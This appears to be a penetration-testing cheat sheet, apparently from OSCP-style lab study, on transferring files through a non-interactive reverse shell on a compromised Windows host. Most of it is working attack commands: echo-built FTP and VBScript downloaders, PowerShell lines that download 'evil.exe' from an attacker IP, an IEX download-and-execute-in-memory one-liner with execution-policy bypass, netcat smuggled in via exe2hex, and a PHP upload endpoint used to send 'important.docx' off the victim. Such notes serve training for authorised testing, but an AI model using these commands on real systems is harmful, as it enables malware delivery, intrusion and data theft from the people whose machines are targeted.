File Transfers

The main problem is the non-interactive shell.

  1. Setup pure-ftpd on your kali Can use this script:
#!/bin/bash

sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /ftphome
sudo pure-pw mkdb
sudo ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd
  1. On windows we can use an ftp with a list of commands so that no interactive shell is required:
# create ftp.txt while in reverse shell on windows:
echo open 192.168.119.234 21> ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET rdp.bat>> ftp.txt
echo bye>> ftp.txt

# ftp execution:
ftp -v -n -s:ftp.txt
  1. HTTP downloader with VBScript for older versions of Windows:
# create wget.vbs while in reverse shell on windows:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# execute the download:
cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
  1. HTTP downloader for newer versions of Windows:
# create wget.ps1 while in reverse shell on windows:
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.4/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

# execute the download:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
  1. HTTP download - one-liner
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/evil.exe', 'new-exploit.exe')
  1. HTTP execute in memory:
powershell.exe IEX (New-Object
System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
  1. On FreeBSD
fetch <url>
  1. exe2hex and powershell
upx -9 nc.exe # compress an exe file, e.g. nc.exe
exe2hex -x nc.exe -p nc.cmd # convert nc.exe to a Windows script (.cmd)
# copy and paste the content of nc.cmd on windows and run it - this should create an nc.exe
  1. Upload from Windows to Linux using PHP upload script (simple POST)

Create the script:

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

Place it under:

/var/www/html

Create the uploads folder and give it the right permissions:

sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Use it from Powershell to upload the file:

powershell (New-Object
System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
  1. TFTP file transfer from Windows XP or Windows Server 2003

Install TFTP (atftpd) on Kali:

sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftp --deamon --port 69 /tftp

Transfer files from Windows to Kali:

tftp -i <your_ip> put <filename>